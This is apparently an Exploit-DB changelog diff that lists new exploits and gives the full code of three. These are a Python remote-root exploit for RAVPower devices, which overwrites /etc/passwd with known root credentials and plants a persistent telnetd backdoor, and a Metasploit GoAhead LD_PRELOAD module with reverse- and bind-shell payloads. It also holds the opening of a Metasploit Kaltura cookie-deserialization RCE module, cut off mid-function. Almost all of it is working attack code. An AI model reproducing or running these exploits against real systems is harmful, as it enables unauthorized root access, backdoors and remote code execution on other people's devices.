DB: 2018-01-25

8 changes to exploits/shellcodes

RAVPower 2.000.056 - Memory Disclosure

Acunetix WVS 10 - Local Privilege Escalation
Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow (Metasploit)
Oracle VirtualBox < 5.1.30 / < 5.2-rc1 - Guest to Host Escape
Blizzard Update Agent - JSON RPC DNS Rebinding

NoMachine 5.3.9 - Local Privilege Escalation

Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)

Acunetix WVS 10 - Remote Command Execution
RAVPower 2.000.056 - Root Remote Code Execution
Kaltura - Remote PHP Code Execution over Cookie (Metasploit)
GoAhead Web Server - 'LD_PRELOAD' Arbitrary Module Load (Metasploit)

Vodafone Mobile Wifi - Reset Admin Password

Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution
Professional Local Directory Script 1.0 - SQL Injection
WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure

exploits/hardware/remote/43871.py

@@ -0,0 +1,544 @@
+"""
+
+# Exploit Title: RAVPower - remote root
+# Date: 23/01/2018
+# Exploit Authors: Daniele Linguaglossa
+# Vendor Homepage: https://www.ravpower.com/
+# Software Link: https://www.ravpower.com/
+# Version: 2.000.056
+# Tested on: OSX
+# CVE : CVE-2018-5997
+
+"""
+
+import requests
+import time
+import telnetlib
+
+
+PATH_PASSWD = "/etc"
+FILE_PASSWD = "passwd"
+PATH_VSTFUNC = "/etc/init.d"
+FILE_VSTFUNC = "vstfunc"
+FILE_RC = "/etc/rc.d/rc"
+BACKDOOR_TERM = "export TERM=xterm"
+BACKDOOR_TELNET = "/usr/sbin/telnetd &"
+BASH_SHEBANG = "#!/bin/sh"
+TELNETD = "/usr/sbin/telnetd -p 1111 &"
+
+
+def upload(host, port, path, name, content):
+    user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0"
+    path = "/upload.csp?uploadpath=%s&file=1515865637281" % path
+    url ="http://{0}:{1}{2}".format(host,port,path)
+    files = {'file' : ('%s' % name, content,'application/octet-stream')}
+    headers = {
+        "user-agent": user_agent
+    }
+    try:
+        requests.post(url,headers=headers,files=files)
+        return True
+    except:
+        return False
+
+
+# root:admin
+tmp_passwd = """root:$1$YBm5LfCo$5OEwLPLUu085z5EoDpQz7/:0:0:root:/data/UsbDisk1/Volume1:/bin/sh
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+admin:$1$QlrmwRgO$c0iSI2euV.U1Wx6yBkDBI.:15:0:admin:/data/UsbDisk1/Volume1:/bin/sh
+mail:*:8:8:mail:/var/mail:/bin/sh
+nobody:x:65534:65534:Nobody:/data/UsbDisk1/Volume1:/bin/sh
+guest:$1$QlrmwRgO$c0iSI2euV.U1Wx6yBkDBI.:512:0:guest:/data/UsbDisk1/Volume1/Share:/bin/sh-new
+"""
+
+tmp_vstfunc = """
+export PATH=/bin:/sbin:/usr/bin:/usr/sbin
+# A function to stop a program.
+killproc() {
+	local base=${1##*/}
+        local pid=
+        pid=`pidof $base`
+	local i
+        if [ -n "$pid" ]; then
+		for i in $pid ; do
+			kill -KILL $i > /dev/null 2>&1
+		done
+        fi
+    	rm -f /var/run/$base.pid
+    	return 0
+}
+# A function to find the pid of a program.
+pidofproc() {
+	local base=${1##*/}
+	#First try "/var/run/*.pid" files
+	if [ -f "/var/run/$base.pid" ]; then
+	        local line p pid=
+		read line < /var/run/$base.pid
+		for p in $line ; do
+		       [ -z "$p" -a -d "/proc/$p" ] && pid="$pid $p"
+		done
+	else
+		pid=`pidof $1 || pidof $base`
+	fi
+	if [ -n "$pid" ]; then
+                echo $pid
+                return 0
+        fi
+	return 1
+}
+# Check if $pid (could be plural) are running
+# Return : 0 run
+#          1 stop
+checkpid() {
+	local i
+	for i in $* ; do
+		if [ -d "/proc/$i" ]; then
+			 return 0
+		fi
+	done
+	return 1
+}
+# Check disk exist
+checkdisk() {
+        return $?
+}
+# save pid and log function
+savesc() {
+	local i=0
+    if [ -n "$3" ]; then
+        touch /var/run/$3.pid
+    fi
+    return $?
+}
+
+# A function check start of a program.
+# return: 1  not exist
+#         0  exist
+checkonly() {
+        local prgname=${1##*/}
+        local pid=
+        if [ -f "/var/run/$prgname.pid" ]; then
+            pid=`pidof $prgname`
+            if [ -n "$pid" ]; then
+                return 0
+            fi
+            return 1
+        else
+            pid=`pidof $prgname`
+            if [ -n "$pid" ]; then
+                if sleep 1 && checkpid $pid && sleep 1 && checkpid $pid && sleep 2 && checkpid $pid ; then
+                    return 2
+                fi
+            fi
+            return 2
+        fi
+
+}
+# A function save etc to mtd.
+# return: 1 failure
+#         0 success
+saveetc() {
+        local ret=0
+
+	/usr/sbin/etc_tools t > /dev/null 2>&1
+	let ret=ret+$?
+#	ret=$[$ret + $?]
+	/usr/sbin/etc_tools p > /dev/null 2>&1
+	let ret=ret+$?
+#	ret=$[$ret + $?]
+
+	return $ret
+}
+# A function resume mtd to etc.
+# return: 1 failure
+#         0 success
+resumeetc() {
+        local ret=0
+
+	/usr/sbin/etc_tools b > /dev/null 2>&1
+	let ret=ret+$?
+#	ret=$[$ret + $?]
+	/usr/sbin/etc_tools u > /dev/null 2>&1
+	let ret=ret+$?
+#	ret=$[$ret + $?]
+
+	return $ret
+}
+
+# Create a lock for /var/lock
+AppScriptLock() {
+	if [ -f /var/lock/$1.pid ]; then
+		return 0
+	else
+		touch /var/lock/$1.pid
+		return 1
+	fi
+}
+
+# Check a lock for /var/lock
+AppScriptChkLock() {
+	if [ -f /var/lock/$1.pid ]; then
+		return 1
+	else
+		return 0
+	fi
+}
+
+# Delete a lock for /var/lock
+AppScriptUnlock() {
+	if [ -f /var/lock/$1.pid ]; then
+		rm -rf /var/lock/$1.pid
+	fi
+	return 1
+}
+
+DISKPATH="/data/UsbDisk1/Volume1/.vst/upgrade"
+ETCPATH="/boot/tmp"
+ETCBKPATH="/boot/tmp/etcbackup"
+DISKETCFILE="/data/UsbDisk1/Volume1/.vst/upgrade/etc.tar"
+DIDKETCBKFILE="/data/UsbDisk1/Volume1/.vst/upgrade/etcbackup.tar.gz"
+ETCFILE="/boot/tmp/etc.tar"
+ETCBKFILETAR="/boot/tmp/etcbackup.tar"
+ETCBKFILE="/boot/tmp/etcbackup.tar.gz"
+FILELIST="hostname passwd shadow samba/smbpasswd fileserv/lighttpd.user dropbox baidu"
+FILELIST1="hostname"
+backup_etc() {
+	rm $ETCBKFILETAR -rf
+        rm $ETCBKFILE -rf
+        rm $ETCBKPATH -rf
+
+        #	if [ ! -e $DISKPATH ];then
+         #       	mkdir -p -m 755 $DISKPATH
+        #	fi
+		if [ ! -e $ETCBKPATH ]; then
+			mkdir -p -m 755 $ETCBKPATH
+		fi
+if [ -z $1 ]; then
+	FILELISTALL=$FILELIST
+else
+	if [ $1 == "resume" ]; then
+		FILELISTALL=$FILELIST1
+	fi
+fi
+		for f in $FILELISTALL
+                do
+                        if [ -d /etc/$f ]; then
+                                cp -rf /etc/$f $ETCBKPATH > /dev/null 2>&1
+                        else
+                                if [ "$f" == "samba/smbpasswd" ]; then
+                                        if [ ! -e $ETCBKPATH/samba ]; then
+                                                mkdir -p $ETCBKPATH/samba
+                                        fi
+                                        cp -rf /etc/$f $ETCBKPATH/$f > /dev/null 2>&1
+                                elif [ "$f" == "fileserv/lighttpd.user" ]; then
+                                        if [ ! -e $ETCBKPATH/fileserv ]; then
+                                                mkdir -p $ETCBKPATH/fileserv
+                                        fi
+                                        cp -rf /etc/$f $ETCBKPATH/$f > /dev/null 2>&1
+                                elif [ "$f" == "serversman/cloud.conf" ]; then
+                                        if [ ! -f /etc/$f ]; then
+                                                continue
+                                        fi
+                                        if [ ! -e $ETCBKPATH/serversman ]; then
+                                                mkdir -p $ETCBKPATH/serversman
+                                        fi
+                                        cp -rf /etc/$f $ETCBKPATH/$f > /dev/null 2>&1
+                                else
+                                	cp -rf /etc/$f $ETCBKPATH > /dev/null 2>&1
+				fi
+                        fi
+                done
+		tar cvf $ETCBKFILETAR $ETCBKPATH > /dev/null 2>&1
+		gzip $ETCBKFILETAR
+		if [ -f $ETCBKFILE ]; then
+			cp -rf $ETCBKFILE $DIDKETCBKFILE
+		fi
+}
+
+
+backup_etc_telnet() {
+	rm $ETCBKFILETAR -rf
+        rm $ETCBKFILE -rf
+        rm $ETCBKPATH -rf
+
+        #	if [ ! -e $DISKPATH ];then
+         #       	mkdir -p -m 755 $DISKPATH
+        #	fi
+		if [ ! -e $ETCBKPATH ]; then
+			mkdir -p -m 755 $ETCBKPATH
+		fi
+if [ -z $1 ]; then
+	FILELISTALL=$FILELIST
+else
+	if [ $1 == "resume" ]; then
+		FILELISTALL=$FILELIST1
+	fi
+fi
+		touch $ETCBKPATH/telnetflag
+		tar cvf $ETCBKFILETAR $ETCBKPATH > /dev/null 2>&1
+		gzip $ETCBKFILETAR
+		if [ -f $ETCBKFILE ]; then
+			cp -rf $ETCBKFILE $DIDKETCBKFILE
+		fi
+}
+
+
+
+
+
+
+
+
+
+restore_etc() {
+		if [ -f $ETCBKFILE ]; then
+			gunzip $ETCBKFILE
+			tar xvf $ETCBKFILETAR -C / > /dev/null 2>&1
+			for f in $FILELIST
+			do
+                        	if [ -d /etc/$f ]; then
+					echo cp -rf $ETCBKPATH/$f /etc/$f >> /tmp/restore_etc
+                                	#cp -rf $ETCBKPATH/$f /etc/$f > /dev/null 2>&1
+                                	cp -rf $ETCBKPATH/$f /etc > /dev/null 2>&1
+                        	else
+                                	if [ "$f" == "samba/smbpasswd" ]; then
+						echo cp -rf $ETCBKPATH/$f /etc/$f >> /tmp/restore_etc
+                                        	cp -rf $ETCBKPATH/$f /etc/$f > /dev/null 2>&1
+                                	elif [ "$f" == "fileserv/lighttpd.user" ]; then
+						echo cp -rf $ETCBKPATH/$f /etc/$f >> /tmp/restore_etc
+                                        	cp -rf $ETCBKPATH/$f /etc/$f > /dev/null 2>&1
+                                        elif [ "$f" == "serversman/cloud.conf" ]; then
+                                                if [ ! -f $ETCBKPATH/$f ]; then
+                                                        continue
+                                                fi
+                                                echo cp -rf $ETCBKPATH/$f /etc/$f >> /tmp/restore_etc
+                                                cp -rf $ETCBKPATH/$f /etc/$f > /dev/null 2>&1
+                                	else
+						echo cp -rf $ETCBKPATH/$f /etc/$f >> /tmp/restore_etc
+						cp -rf $ETCBKPATH/$f /etc/$f > /dev/null 2>&1
+					fi
+				fi
+			done
+			if [ -f $ETCBKPATH/telnetflag ]; then
+				touch /etc/telnetflag
+			fi
+		fi
+}
+
+# A function check usb flag
+# return: 0 service start
+#         1 service stop
+check_usb_flag() {
+        local ret=0
+
+        if [ -e "/proc/usbwrite" ];then
+                ret=`cat /proc/usbwrite`
+        fi
+
+        return $ret
+}
+
+###########################################################################
+#
+# LED operations
+#
+###########################################################################
+led_wink_start() {
+	LED=`cat /proc/vsled`
+	if [ $LED -eq 3 ]; then
+		pioctl wifi 2
+	fi
+}
+led_wink_stop() {
+	LED=`cat /proc/vsled`
+	if [ $LED -eq 2 ]; then
+		pioctl wifi 3
+	fi
+}
+led_wink_chk() {
+	LED=`cat /proc/vsled`
+	if [ $LED -eq 2 ]; then
+		return 1
+	else
+		return 0
+	fi
+}
+
+###########################################################################
+#
+# Flag operation
+#
+###########################################################################
+flagctl_get() {
+	if [ -e /dev/sda ]; then
+		trynum=0
+		while [ $trynum -lt 3 ]; do
+			retval=`/usr/sbin/flagctl disk get $1`
+			if [ ! -z $retval ]; then
+				return $retval
+			fi
+			let trynum=trynum+1
+#			trynum=$[$trynum+1]
+			sleep 1
+		done
+	fi
+}
+
+flagctl_set() {
+	if [ -e /dev/sda ]; then
+		trynum=0
+		while [ $trynum -lt 3 ]; do
+			/usr/sbin/flagctl disk set $1 $2
+			flagctl_get $1
+			if [ "$?" -eq "$2" ]; then
+				sync
+				return 1
+			fi
+			let trynum=trynum+1
+#			trynum=$[$trynum+1]
+			sleep 1
+		done
+	fi
+	return 0
+}
+
+###########################################################################
+#
+# string function
+#
+###########################################################################
+str_func_strstr () {
+	if [ ${#2} -eq 0 ];then
+		echo "$1"
+		return 0
+	fi
+	case "$1" in
+		*$2*)
+			return 1
+			;;
+		*)
+			return 0
+			;;
+	esac
+}
+
+dev_test_host() {
+	nordev=`echo $1 | cut -c -3`
+	s_str=`ls -l /sys/block/$nordev/device`
+	str_func_strstr "$s_str" "host0"
+	if [ $? -eq 1 ]; then
+		return 1
+	fi
+	return 0;
+}
+
+dev_test_usb() {
+        nordev=`echo $1 | cut -c -3`
+        s_str=`ls -l /sys/block/$nordev/device`
+        str_func_strstr "$s_str" "usb"
+        if [ $? -eq 1 ]; then
+                return 1
+        fi
+        return 0;
+}
+
+###########################################################################
+#
+# Permission check functions
+#
+###########################################################################
+# $1: device name
+# $2: host/usb
+# $3: if recursive, 1: enable, 0: disable
+perm_change_start() {
+	permpid=`ps | grep "/usr/sbin/permchange $1" | cut -d' ' -f2`
+	if [ ! -z $permpid ]; then
+		return 1;
+	else
+		/usr/sbin/permchange $1 $2 $3 &
+	fi
+}
+
+# $1: device name
+# $2: if recursive, 1: enable, 0: disable
+perm_chk_start() {
+	dev_test_host $1
+	if [ $? -eq 1 ]; then
+		perm_change_start $1 host $2
+	else
+		perm_change_start $1 usb $2
+	fi
+}
+
+perm_chk_stop() {
+	permpid=`ps | grep "/usr/sbin/permchange $1" | cut -d' ' -f2`
+	if [ ! -z $permpid ]; then
+		for ppid in $permpid ; do
+			kill -9 $ppid > /dev/null 2>&1
+		done
+	fi
+}
+
+###########################################################################
+# Time function
+###########################################################################
+timedate_settosys() {
+	if [ -e /etc/timedate ]; then
+        	TIMESET=`cat /etc/timedate`
+        	date -s $TIMESET
+	fi
+}
+
+timedate_save() {
+	date '+%Y.%m.%d-%H:%M:%S' > /etc/timedate
+}
+"""
+print "RAVPower Remote root (0day) - By dzonerzy & r3dx0f\n\n"
+host = raw_input("Insert Ravpower IP: ")
+print "[*] Step 1 -> pwning /etc/passwd"
+if not upload(host, 80,PATH_PASSWD,FILE_PASSWD,tmp_passwd):
+    print "[-] Filed to pwn /etc/passwd maybe fixed?"
+    exit(0)
+print "[*] Step 2 -> pwning /etc/init.d/vstfunc"
+if not upload(host, 80,PATH_VSTFUNC,FILE_VSTFUNC,BASH_SHEBANG+"\n"+TELNETD+"\n"+tmp_vstfunc):
+    print "[-] Filed to pwn /etc/init.d/vstfunc maybe fixed?"
+    exit(0)
+t = None
+print "[*] Step 3 -> Try to remove or insert SD Card or just wait for something happen (something must happen!)"
+while True:
+    try:
+        print "[*] Step 3-1 -> Trying to telnet..."
+        t = telnetlib.Telnet(host, port=1111)
+        break
+    except:
+        time.sleep(5)
+t.read_until(": ")
+t.write("root\n")
+t.read_until(": ")
+t.write("admin\n")
+t.read_until("# ")
+print "[*] Step 4 -> pwning /etc/rc.d/rc"
+t.write("echo '%s' >> %s\n" % (BACKDOOR_TERM, FILE_RC))
+t.read_until("# ")
+t.write("echo '%s' >> %s\n" % (BACKDOOR_TELNET, FILE_RC))
+t.read_until("# ")
+print "[*] Step 4-1 -> pwned!"
+print "[*] Step 5 -> Saving settings"
+t.write("/usr/sbin/etc_tools p\n")
+t.read_until("# ")
+print "[*] Step 5-1 -> Done!"
+print "[*] Step 6 -> Starting telnetd"
+t.write("/usr/sbin/telnetd &\n")
+t.read_until("# ")
+print "[*] Step 6-1 -> Done!"
+print "[*] Step 7 -> Killing old telnet"
+t.write("ps aux   |grep 1111  | awk '{print $2}' | xargs kill -9\n")
+t.read_until("# ")
+print "[*] Step 7-1 -> Done!"
+print "[*] Step 8 -> Restoring vstfunc"
+if not upload(host, 80,PATH_VSTFUNC,FILE_VSTFUNC,BASH_SHEBANG+"\n"+tmp_vstfunc):
+    print "[-] Filed to pwn /etc/init.d/vstfunc fixed?"
+    exit(0)
+print "[*] Step 8-1 -> Done!"
+print "[!] PWNAGE COMPLETED! connect with root:admin"

exploits/multiple/remote/43877.rb

@@ -0,0 +1,391 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'GoAhead Web Server LD_PRELOAD Arbitrary Module Load',
+      'Description'    => %q{
+          This module triggers an arbitrary shared library load vulnerability
+        in GoAhead web server versions between 2.5 and that have the CGI module
+        enabled.
+      },
+      'Author'         =>
+        [
+          'Daniel Hodson <daniel[at]elttam.com.au>', # Elttam Vulnerability Discovery & Python Exploit
+          'h00die',                                  # Metasploit Module
+          'hdm',                                     # Metasploit Module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2017-17562' ],
+          [ 'URL', 'https://www.elttam.com.au/blog/goahead/' ]
+        ],
+      'Payload'         =>
+        {
+          'Space'       => 5000,
+          'DisableNops' => true
+        },
+      'Platform'        => 'linux',
+      'Targets'         =>
+        [
+
+          [ 'Automatic (Reverse Shell)',
+            { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ], 'ReverseStub' => true,
+              'Payload' => {
+                'Compat' => {
+                  'PayloadType' => 'cmd_reverse_stub',
+                  'ConnectionType' => 'reverse',
+                }
+              }
+            }
+          ],
+
+          [ 'Automatic (Bind Shell)',
+            { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ], 'BindStub' => true,
+              'Payload' => {
+                'Compat' => {
+                  'PayloadType' => 'cmd_bind_stub',
+                  'ConnectionType' => 'bind'
+                }
+              }
+            }
+          ],
+
+          [ 'Automatic (Command)',
+            { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] }
+          ],
+          [ 'Linux x86',        { 'Arch' => ARCH_X86 } ],
+          [ 'Linux x86_64',     { 'Arch' => ARCH_X64 } ],
+          [ 'Linux ARM (LE)',   { 'Arch' => ARCH_ARMLE } ],
+          [ 'Linux ARM64',      { 'Arch' => ARCH_AARCH64 } ],
+          [ 'Linux MIPS',       { 'Arch' => ARCH_MIPS } ],
+          [ 'Linux MIPSLE',     { 'Arch' => ARCH_MIPSLE } ],
+          [ 'Linux MIPS64',     { 'Arch' => ARCH_MIPS64 } ],
+          [ 'Linux MIPS64LE',   { 'Arch' => ARCH_MIPS64LE } ],
+
+          # PowerPC stubs are currently over the 16384 maximum POST size
+          # [ 'Linux PPC',        { 'Arch' => ARCH_PPC } ],
+          # [ 'Linux PPC64',      { 'Arch' => ARCH_PPC64 } ],
+          # [ 'Linux PPC64 (LE)', { 'Arch' => ARCH_PPC64LE } ],
+
+          [ 'Linux SPARC',      { 'Arch' => ARCH_SPARC } ],
+          [ 'Linux SPARC64',    { 'Arch' => ARCH_SPARC64 } ],
+          [ 'Linux s390x',      { 'Arch' => ARCH_ZARCH } ],
+        ],
+      'DefaultOptions' =>
+        {
+          'SHELL'      => '/bin/sh',
+        },
+      'Privileged'      => false,
+      'DisclosureDate'  => 'Dec 18 2017', # June 9th, technically, via github commit.
+      'DefaultTarget'   => 0))
+
+    register_options(
+      [
+        OptString.new('TARGET_URI', [false, 'The path to a CGI script on the GoAhead server'])
+      ])
+  end
+
+  # Setup our mapping of Metasploit architectures to gcc architectures
+  def setup
+    super
+    @@payload_arch_mappings = {
+        ARCH_X86      => [ 'x86' ],
+        ARCH_X64      => [ 'x86_64' ],
+        ARCH_MIPS     => [ 'mips' ],
+        ARCH_MIPSLE   => [ 'mipsel' ],
+        ARCH_MIPSBE   => [ 'mips' ],
+        ARCH_MIPS64   => [ 'mips64' ],
+        ARCH_MIPS64LE => [ 'mips64el' ],
+
+        # PowerPC stubs are currently over the 16384 maximum POST size
+        # ARCH_PPC      => [ 'powerpc' ],
+        # ARCH_PPC64    => [ 'powerpc64' ],
+        # ARCH_PPC64LE  => [ 'powerpc64le' ],
+
+        ARCH_SPARC    => [ 'sparc' ],
+        ARCH_SPARC64  => [ 'sparc64' ],
+        ARCH_ARMLE    => [ 'armel', 'armhf' ],
+        ARCH_AARCH64  => [ 'aarch64' ],
+        ARCH_ZARCH    => [ 's390x' ],
+    }
+
+    # Architectures we don't offically support but can shell anyways with interact
+    @@payload_arch_bonus = %W{
+      mips64el sparc64 s390x
+    }
+
+    # General platforms (OS + C library)
+    @@payload_platforms = %W{
+      linux-glibc
+    }
+  end
+
+  # Use fancy payload wrappers to make exploitation a joyously lazy exercise
+  def cycle_possible_payloads
+    template_base = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2017-17562")
+    template_list = []
+    template_type = nil
+    template_arch = nil
+
+    # Handle the generic command types first
+    if target.arch.include?(ARCH_CMD)
+
+      # Default to a system() template
+      template_type = 'system'
+
+      # Handle reverse_tcp() templates
+      if target['ReverseStub']
+        template_type = 'reverse'
+      end
+
+      # Handle reverse_tcp() templates
+      if target['BindStub']
+        template_type = 'bind'
+      end
+
+      all_architectures = @@payload_arch_mappings.values.flatten.uniq
+
+      # Prioritize the most common architectures first
+      %W{ x86_64 x86 armel armhf mips mipsel }.each do |t_arch|
+        template_list << all_architectures.delete(t_arch)
+      end
+
+      # Queue up the rest for later
+      all_architectures.each do |t_arch|
+        template_list << t_arch
+      end
+
+    # Handle the specific architecture targets next
+    else
+      template_type = 'shellcode'
+      target.arch.each do |t_name|
+        @@payload_arch_mappings[t_name].each do |t_arch|
+          template_list << t_arch
+        end
+      end
+    end
+
+    # Remove any duplicates that may have snuck in
+    template_list.uniq!
+
+    # Cycle through each top-level platform we know about
+    @@payload_platforms.each do |t_plat|
+
+      # Cycle through each template and yield
+      template_list.each do |t_arch|
+
+
+        wrapper_path = ::File.join(template_base, "goahead-cgi-#{template_type}-#{t_plat}-#{t_arch}.so.gz")
+        unless ::File.exist?(wrapper_path)
+          raise RuntimeError.new("Missing executable template at #{wrapper_path}")
+        end
+
+        data = ''
+        ::File.open(wrapper_path, "rb") do |fd|
+          data = Rex::Text.ungzip(fd.read)
+        end
+
+        pidx = data.index('PAYLOAD')
+        if pidx
+          data[pidx, payload.encoded.length] = payload.encoded
+        end
+
+        if %W{reverse bind}.include?(template_type)
+          pidx = data.index("55555")
+          if pidx
+            data[pidx, 5] = datastore['LPORT'].to_s.ljust(5)
+          end
+        end
+
+        if 'reverse' == template_type
+          pidx = data.index("000.000.000.000")
+          if pidx
+            data[pidx, 15] = datastore['LHOST'].to_s.ljust(15)
+          end
+        end
+
+        vprint_status("Using payload wrapper 'goahead-cgi-#{template_type}-#{t_arch}'...")
+        yield(data)
+
+        # Introduce a small delay for the payload to stage
+        Rex.sleep(0.50)
+
+        # Short-circuit once we have a session
+        return if session_created?
+      end
+    end
+  end
+
+  # Start the shell train
+  def exploit
+    # Find a valid CGI target
+    target_uri = find_target_cgi
+    return unless target_uri
+
+    # Create wrappers for each potential architecture
+    cycle_possible_payloads do |wrapped_payload|
+
+      # Trigger the vulnerability and run the payload
+      trigger_payload(target_uri, wrapped_payload)
+      return if session_created?
+    end
+  end
+
+  # Determine whether the target is exploitable
+  def check
+    # Find a valid CGI target
+    target_uri = find_target_cgi
+    unless target_uri
+      return Exploit::CheckCode::Unknown
+    end
+    return Exploit::CheckCode::Vulnerable
+  end
+
+  # Upload and LD_PRELOAD execute the shared library payload
+  def trigger_payload(target_uri, wrapped_payload)
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri),
+      'vars_get' => {
+        'LD_PRELOAD' => '/proc/self/fd/0'
+      },
+      'data' => wrapped_payload
+    })
+
+    nil
+  end
+
+  # Find an exploitable CGI endpoint. These paths were identified by mining Sonar HTTP datasets
+  def find_target_cgi
+
+    target_uris = []
+    common_dirs = %W^
+/
+/cgi-bin/
+/cgi/
+^
+    common_exts = ["", ".cgi"]
+    common_cgis = %W^
+admin
+apply
+non-CA-rev
+checkCookie
+check_user
+chn/liveView
+cht/liveView
+cnswebserver
+config
+configure/set_link_neg
+configure/swports_adjust
+eng/liveView
+firmware
+getCheckCode
+get_status
+getmac
+getparam
+guest/Login
+home
+htmlmgr
+index
+index/login
+jscript
+kvm
+liveView
+login
+login.asp
+login/login
+login/login-page
+login_mgr
+luci
+main
+main-cgi
+manage/login
+menu
+mlogin
+netbinary
+nobody/Captcha
+nobody/VerifyCode
+normal_userLogin
+otgw
+page
+rulectl
+service
+set_new_config
+sl_webviewer
+ssi
+status
+sysconf
+systemutil
+t/out
+top
+unauth
+upload
+variable
+wanstatu
+webcm
+webmain
+webproc
+webscr
+webviewLogin
+webviewLogin_m64
+webviewer
+welcome
+cgitest
+^
+
+    if datastore['TARGET_URI'].to_s.length > 0
+      target_uris << datastore['TARGET_URI']
+    end
+
+    common_dirs.each do |cgi_dir|
+      common_cgis.each do |cgi_path|
+        common_exts.each do |cgi_ext|
+          target_uris << "#{cgi_dir}#{cgi_path}#{cgi_ext}"
+        end
+      end
+    end
+
+    print_status("Searching #{target_uris.length} paths for an exploitable CGI endpoint...")
+
+    target_uris.each do |uri|
+      if is_cgi_exploitable?(uri)
+        print_good("Exploitable CGI located at #{uri}")
+        return uri
+      end
+    end
+
+    print_error("No valid CGI endpoints identified")
+    return
+  end
+
+  # Use the output of LD_DEBUG=help to determine whether an endpoint is exploitable
+  def is_cgi_exploitable?(uri)
+    res = send_request_cgi({'uri' => uri, 'method' => 'POST', 'vars_get' => { 'LD_DEBUG' => 'help' }})
+
+    if res
+      vprint_status("Request for #{uri} returned #{res.code}: #{res.message}")
+    else
+      vprint_status("Request for #{uri} did not return a response")
+    end
+
+    !!(res && res.body && res.body.to_s.include?("LD_DEBUG_OUTPUT"))
+  end
+
+  # This sometimes determines if the CGI module is enabled, but doesn't seem
+  # to return the error to the client in newer versions. Unused for now.
+  def is_cgi_enabled?
+    return true
+    res = send_request_cgi({'uri' => "/cgi-bin"})
+    !!(res && res.body && res.body.to_s.include?("Missing CGI name"))
+  end
+end

exploits/php/remote/43876.rb

@@ -0,0 +1,146 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  CookieSecret = 'y3tAno3therS$cr3T'
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Kaltura Remote PHP Code Execution over Cookie',
+      'Description'    => %q{
+        This module exploits an Object Injection vulnerability in Kaltura.
+        By exploiting this vulnerability, unauthenticated users can execute
+        arbitrary code under the context of the web server user.
+
+        Kaltura makes use of a hardcoded cookie secret which allows to sign
+        arbitrary cookie data. After passing this signature check, the base64-
+        decoded data is passed to PHPs unserialize() function which allows for
+        code execution. The constructed object is again based on the SektionEins
+        Zend code execution POP chain PoC. Kaltura versions prior to 13.1.0 are
+        affected by this issue.
+
+        A valid entry_id (which is required for this exploit) can be obtained
+        from any media resource published on the kaltura installation.
+
+        This module was tested against Kaltura 13.1.0-2 installed on Ubuntu 14.04.
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Robin Verton <hello@robinverton.de>',
+          'Mehmet Ince <mehmet@mehmetince.net>' # first kaltura rce module
+        ],
+      'References'      =>
+        [
+          ['CVE', '2017-14143']
+        ],
+      'Privileged'      => false,
+      'Platform'        => ['php'],
+      'Arch'            => ARCH_PHP,
+      'Targets'         => [ ['Automatic', {}] ],
+      'DisclosureDate'  => 'Sep 12 2017',
+      'DefaultTarget'   => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The target URI of the Kaltura installation', '/']),
+        OptString.new('ENTRYID', [true, 'Valid entry ID of any media resource (example: 0_lahha4c9)', ''])
+      ]
+    )
+  end
+
+  def check
+    r = rand_text_alpha(15 + rand(4))
+    entry_id = datastore['ENTRYID']
+    cmd = "print_r(#{r}).die()"
+
+    p = ""
+    p << "a:1:{s:1:\"z\";O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";"
+    p << "a:1:{i:0;O:20:\"Zend_Log_Writer_Mail\":5:{s:16:\"\00*\00_eventsToMail\";"
+    p << "a:1:{i:0;i:1;}s:22:\"\00*\00_layoutEventsToMail\";a:0:{}s:8:\"\00*\00_mail\";"
+    p << "O:9:\"Zend_Mail\":0:{}s:10:\"\00*\00_layout\";O:11:\"Zend_Layout\":3:{s:13:\"\00*\00_inflector\";"
+    p << "O:23:\"Zend_Filter_PregReplace\":2:{s:16:\"\00*\00_matchPattern\";s:7:\"/(.*)/e\";"
+    p << "s:15:\"\00*\00_replacement\";s:#{cmd.length.to_s}:\"#{cmd}\";}s:20:\"\00*\00_inflectorEnabled\";"
+    p << "b:1;s:10:\"\00*\00_layout\";s:6:\"layout\";}s:22:\"\00*\00_subjectPrependText\";N;}}};}"
+
+    encoded = Rex::Text.encode_base64(p)
+    hash = Rex::Text.md5("#{encoded}#{CookieSecret}")
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'index.php', 'keditorservices', 'getAllEntries'),
+      'vars_get' => {
+        'list_type' => '15',
+        'entry_id' => entry_id
+      },
+      'cookie' => "userzone=#{encoded}#{hash}"
+    )
+
+    if res && res.redirect?
+      print_error("Got a redirect, maybe you are not using https? #{res.headers['Location']}")
+      Exploit::CheckCode::Safe
+    elsif res && res.body.include?(r)
+      Exploit::CheckCode::Vulnerable
+    elsif !check_entryid
+      print_error("Invalid ENTRYID")
+      Exploit::CheckCode::Safe
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def check_entryid
+    entry_id = datastore['ENTRYID']
+    res = send_request_cgi(
+      'method' => 'GET',
